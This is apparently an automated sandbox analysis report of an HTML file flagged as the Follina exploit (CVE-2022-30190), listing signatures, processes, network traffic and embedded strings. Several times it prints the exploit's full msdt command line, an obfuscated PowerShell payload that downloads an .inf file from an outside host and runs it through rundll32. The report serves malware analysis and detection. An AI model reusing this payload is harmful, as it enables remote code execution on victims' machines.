Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
test.html

Overview

General Information

Sample Name:test.html
Analysis ID:676560
MD5:7f1444fb3577da9970eb8d035b26ced6
SHA1:87306ad6261bdfebf00d379f242fca7eef6fab03
SHA256:9d0d97fcb30473b981b65cc9281575b42213f44a2d163f753174df34b37c44f4
Tags:CVE-2022-30190Follinahtml
Infos:

Detection

Follina CVE-2022-30190
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Drops PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
IP address seen in connection with other malware
PE file contains sections with non-standard names

Classification

  • System is w10x64
  • chrome.exe (PID: 5592 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: C139654B5C1438A95B321BB01AD63EF6)
    • chrome.exe (PID: 3460 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1520,12347978893562917743,15623376124230255058,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1924 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
    • msdt.exe (PID: 5888 cmdline: "C:\Windows\system32\msdt.exe" ms-msdt:/ID%20PcwdiAgnOSTiC%20-sKiP%20forCe%20-pArAm%20%22IT_ReBRowseforfiLE=#Ja2Y%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=W5A$(Iex($(IeX('[sYSTem.teXt.enCODinG]'+[cHar]58+[chAR]58+'uTf8.geTStRiNg([sYStem.CoNVErT]'+[char]58+[char]0x3A+'fRombASe64StRINg('+[CHar]0X22+'U1RPcC1Qck9jZXNTIC1mb1JjZSAtTmFNZSAnbXNkdCc7JEtZID0gYWRkLXRZUEUgLW1lbUJlcmRFRmluaVRJT04gJ1tEbGxJbXBvcnQoIlVSbG1vTi5EbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIFIsc3RyaW5nIGJpTCxzdHJpbmcgdXdlLHVpbnQgUm5vLEludFB0ciB1Ryk7JyAtbkFtRSAiWXZRIiAtTkFtRVNQYUNlIEhLZyAtUGFzc1RocnU7ICRLWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovL3BvbHBoYXJtYXIuY29tL3Rlc3QuaW5mIiwiJGVudjpBUFBEQVRBXHRlc3QuaW5mIiwwLDApO1NUYXJ0LXNMRWVQKDMpO1J1bkRsbDMyLkVYZSBhZHZwQWNLLmRsTCxMYXVuY2hJTkZTZWN0aW9uRXggIiRlTlY6QVBQREFUQVx0ZXN0LmluZiIsREVmQXVsdEluc1RBbGxfU0luZ2xFVVNFciwiJGVOdjpBUFBEQVRBXHRlc3QuaW5mIiw0LDA7U1RvUC1QUm9jRVNTIC1Gb3JDZSAtTmFNZSAnc2RpYWduaG9zdCc='+[CHar]34+'))'))))xW/../../../../../../../../../../../../../../../../.MsI%20%22 MD5: 8BE43BAF1F37DA5AB31A53CA1C07EE0C)
  • chrome.exe (PID: 6288 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\test.html MD5: C139654B5C1438A95B321BB01AD63EF6)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000008.00000002.850955898.000002540CF44000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
    00000008.00000002.851000910.000002540CF60000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      No Sigma rule has matched
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: test.htmlVirustotal: Detection: 8%Perma Link

      Exploits

      barindex
      Source: Yara matchFile source: 00000008.00000002.850955898.000002540CF44000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.851000910.000002540CF60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdicJump to behavior
      Source: Binary string: widevinecdm.dll.pdb source: widevinecdm.dll.0.dr
      Source: Binary string: widevinecdm.dll.pdb@ source: widevinecdm.dll.0.dr
      Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
      Source: unknownDNS traffic detected: queries for: accounts.google.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfmX-Goog-Update-Updater: chromecrx-85.0.4183.121Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: widevinecdm.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: widevinecdm.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
      Source: widevinecdm.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
      Source: widevinecdm.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: widevinecdm.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
      Source: widevinecdm.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
      Source: widevinecdm.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: widevinecdm.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
      Source: widevinecdm.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: widevinecdm.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
      Source: widevinecdm.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
      Source: pnacl_public_x86_64_pnacl_sz_nexe.0.dr, pnacl_public_x86_64_pnacl_llc_nexe.0.drString found in binary or memory: http://llvm.org/):
      Source: widevinecdm.dll.0.drString found in binary or memory: http://ocsp.digicert.com0
      Source: widevinecdm.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
      Source: widevinecdm.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
      Source: widevinecdm.dll.0.drString found in binary or memory: http://ocsp.digicert.com0O
      Source: widevinecdm.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
      Source: 1e9d967a-c972-4f0c-9ae6-0677696f3671.tmp.1.drString found in binary or memory: https://accounts.google.com
      Source: craw_window.js.0.drString found in binary or memory: https://accounts.google.com/MergeSession
      Source: 1e9d967a-c972-4f0c-9ae6-0677696f3671.tmp.1.drString found in binary or memory: https://apis.google.com
      Source: pnacl_public_x86_64_crtend_o.0.dr, pnacl_public_x86_64_ld_nexe.0.drString found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-clang.git
      Source: pnacl_public_x86_64_crtend_o.0.dr, pnacl_public_x86_64_ld_nexe.0.drString found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-llvm.git
      Source: 1e9d967a-c972-4f0c-9ae6-0677696f3671.tmp.1.drString found in binary or memory: https://clients2.google.com
      Source: manifest.json1.0.dr, manifest.json.0.drString found in binary or memory: https://clients2.google.com/service/update2/crx
      Source: 1e9d967a-c972-4f0c-9ae6-0677696f3671.tmp.1.drString found in binary or memory: https://clients2.googleusercontent.com
      Source: pnacl_public_x86_64_ld_nexe.0.drString found in binary or memory: https://code.google.com/p/nativeclient/issues/entry
      Source: pnacl_public_x86_64_ld_nexe.0.drString found in binary or memory: https://code.google.com/p/nativeclient/issues/entry%s:
      Source: 246bcc96-50e9-47ca-924e-0964b8dd5ed7.tmp.1.dr, 1e9d967a-c972-4f0c-9ae6-0677696f3671.tmp.1.dr, e6f94121-00aa-4ef2-b378-44e953d64964.tmp.1.drString found in binary or memory: https://dns.google
      Source: 1e9d967a-c972-4f0c-9ae6-0677696f3671.tmp.1.drString found in binary or memory: https://fonts.googleapis.com
      Source: 1e9d967a-c972-4f0c-9ae6-0677696f3671.tmp.1.drString found in binary or memory: https://fonts.gstatic.com
      Source: craw_window.js.0.dr, craw_background.js.0.drString found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
      Source: 1e9d967a-c972-4f0c-9ae6-0677696f3671.tmp.1.drString found in binary or memory: https://ogs.google.com
      Source: craw_window.js.0.dr, manifest.json.0.drString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
      Source: craw_window.js.0.dr, manifest.json.0.drString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
      Source: 1e9d967a-c972-4f0c-9ae6-0677696f3671.tmp.1.drString found in binary or memory: https://ssl.gstatic.com
      Source: craw_window.js.0.dr, craw_background.js.0.drString found in binary or memory: https://www-googleapis-staging.sandbox.google.com
      Source: widevinecdm.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
      Source: 1e9d967a-c972-4f0c-9ae6-0677696f3671.tmp.1.drString found in binary or memory: https://www.google.com
      Source: manifest.json.0.drString found in binary or memory: https://www.google.com/
      Source: craw_window.js.0.drString found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
      Source: craw_window.js.0.drString found in binary or memory: https://www.google.com/images/cleardot.gif
      Source: craw_window.js.0.drString found in binary or memory: https://www.google.com/images/dot2.gif
      Source: craw_window.js.0.drString found in binary or memory: https://www.google.com/images/x2.gif
      Source: craw_background.js.0.drString found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
      Source: craw_window.js.0.dr, craw_background.js.0.dr, 1e9d967a-c972-4f0c-9ae6-0677696f3671.tmp.1.drString found in binary or memory: https://www.googleapis.com
      Source: manifest.json.0.drString found in binary or memory: https://www.googleapis.com/
      Source: manifest.json.0.drString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
      Source: manifest.json.0.drString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
      Source: manifest.json.0.drString found in binary or memory: https://www.googleapis.com/auth/sierra
      Source: manifest.json.0.drString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
      Source: 1e9d967a-c972-4f0c-9ae6-0677696f3671.tmp.1.drString found in binary or memory: https://www.gstatic.com
      Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: test.htmlVirustotal: Detection: 8%
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Local\Temp\0793800c-657c-42d9-958d-612619f1006d.tmpJump to behavior
      Source: C:\Windows\System32\msdt.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: classification engineClassification label: mal56.expl.winHTML@35/124@2/6
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1520,12347978893562917743,15623376124230255058,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1924 /prefetch:8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\test.html
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/ID%20PcwdiAgnOSTiC%20-sKiP%20forCe%20-pArAm%20%22IT_ReBRowseforfiLE=#Ja2Y%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=W5A$(Iex($(IeX('[sYSTem.teXt.enCODinG]'+[cHar]58+[chAR]58+'uTf8.geTStRiNg([sYStem.CoNVErT]'+[char]58+[char]0x3A+'fRombASe64StRINg('+[CHar]0X22+'U1RPcC1Qck9jZXNTIC1mb1JjZSAtTmFNZSAnbXNkdCc7JEtZID0gYWRkLXRZUEUgLW1lbUJlcmRFRmluaVRJT04gJ1tEbGxJbXBvcnQoIlVSbG1vTi5EbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIFIsc3RyaW5nIGJpTCxzdHJpbmcgdXdlLHVpbnQgUm5vLEludFB0ciB1Ryk7JyAtbkFtRSAiWXZRIiAtTkFtRVNQYUNlIEhLZyAtUGFzc1RocnU7ICRLWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovL3BvbHBoYXJtYXIuY29tL3Rlc3QuaW5mIiwiJGVudjpBUFBEQVRBXHRlc3QuaW5mIiwwLDApO1NUYXJ0LXNMRWVQKDMpO1J1bkRsbDMyLkVYZSBhZHZwQWNLLmRsTCxMYXVuY2hJTkZTZWN0aW9uRXggIiRlTlY6QVBQREFUQVx0ZXN0LmluZiIsREVmQXVsdEluc1RBbGxfU0luZ2xFVVNFciwiJGVOdjpBUFBEQVRBXHRlc3QuaW5mIiw0LDA7U1RvUC1QUm9jRVNTIC1Gb3JDZSAtTmFNZSAnc2RpYWduaG9zdCc='+[CHar]34+'))'))))xW/../../../../../../../../../../../../../../../../.MsI%20%22
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1520,12347978893562917743,15623376124230255058,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1924 /prefetch:8Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/ID%20PcwdiAgnOSTiC%20-sKiP%20forCe%20-pArAm%20%22IT_ReBRowseforfiLE=#Ja2Y%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=W5A$(Iex($(IeX('[sYSTem.teXt.enCODinG]'+[cHar]58+[chAR]58+'uTf8.geTStRiNg([sYStem.CoNVErT]'+[char]58+[char]0x3A+'fRombASe64StRINg('+[CHar]0X22+'U1RPcC1Qck9jZXNTIC1mb1JjZSAtTmFNZSAnbXNkdCc7JEtZID0gYWRkLXRZUEUgLW1lbUJlcmRFRmluaVRJT04gJ1tEbGxJbXBvcnQoIlVSbG1vTi5EbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIFIsc3RyaW5nIGJpTCxzdHJpbmcgdXdlLHVpbnQgUm5vLEludFB0ciB1Ryk7JyAtbkFtRSAiWXZRIiAtTkFtRVNQYUNlIEhLZyAtUGFzc1RocnU7ICRLWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovL3BvbHBoYXJtYXIuY29tL3Rlc3QuaW5mIiwiJGVudjpBUFBEQVRBXHRlc3QuaW5mIiwwLDApO1NUYXJ0LXNMRWVQKDMpO1J1bkRsbDMyLkVYZSBhZHZwQWNLLmRsTCxMYXVuY2hJTkZTZWN0aW9uRXggIiRlTlY6QVBQREFUQVx0ZXN0LmluZiIsREVmQXVsdEluc1RBbGxfU0luZ2xFVVNFciwiJGVOdjpBUFBEQVRBXHRlc3QuaW5mIiw0LDA7U1RvUC1QUm9jRVNTIC1Gb3JDZSAtTmFNZSAnc2RpYWduaG9zdCc='+[CHar]34+'))'))))xW/../../../../../../../../../../../../../../../../.MsI%20%22Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-62E8135D-15D8.pmaJump to behavior
      Source: C:\Windows\System32\msdt.exeAutomated click: Next
      Source: C:\Windows\System32\msdt.exeAutomated click: Next
      Source: C:\Windows\System32\msdt.exeAutomated click: Next
      Source: C:\Windows\System32\msdt.exeAutomated click: Next
      Source: C:\Windows\System32\msdt.exeAutomated click: Next
      Source: C:\Windows\System32\msdt.exeAutomated click: Next
      Source: C:\Windows\System32\msdt.exeAutomated click: Next
      Source: C:\Windows\System32\msdt.exeAutomated click: Next
      Source: C:\Windows\System32\msdt.exeAutomated click: Next
      Source: C:\Windows\System32\msdt.exeAutomated click: Next
      Source: C:\Windows\System32\msdt.exeAutomated click: Next
      Source: C:\Windows\System32\msdt.exeAutomated click: Next
      Source: C:\Windows\System32\msdt.exeAutomated click: Next
      Source: C:\Windows\System32\msdt.exeAutomated click: Next
      Source: C:\Windows\System32\msdt.exeAutomated click: Next
      Source: C:\Windows\System32\msdt.exeAutomated click: Next
      Source: C:\Windows\System32\msdt.exeAutomated click: Next
      Source: C:\Windows\System32\msdt.exeAutomated click: Next
      Source: C:\Windows\System32\msdt.exeAutomated click: Next
      Source: C:\Windows\System32\msdt.exeAutomated click: Next
      Source: C:\Windows\System32\msdt.exeAutomated click: Next
      Source: C:\Windows\System32\msdt.exeAutomated click: Next
      Source: C:\Windows\System32\msdt.exeAutomated click: Next
      Source: C:\Windows\System32\msdt.exeAutomated click: Next
      Source: C:\Windows\System32\msdt.exeFile opened: C:\Windows\system32\MSFTEDIT.DLLJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdicJump to behavior
      Source: Binary string: widevinecdm.dll.pdb source: widevinecdm.dll.0.dr
      Source: Binary string: widevinecdm.dll.pdb@ source: widevinecdm.dll.0.dr
      Source: widevinecdm.dll.0.drStatic PE information: section name: .00cfg
      Source: widevinecdm.dll.0.drStatic PE information: section name: .rodata
      Source: widevinecdm.dll.0.drStatic PE information: section name: _RDATA
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Local\Temp\5592_813092686\_platform_specific\win_x64\widevinecdm.dllJump to dropped file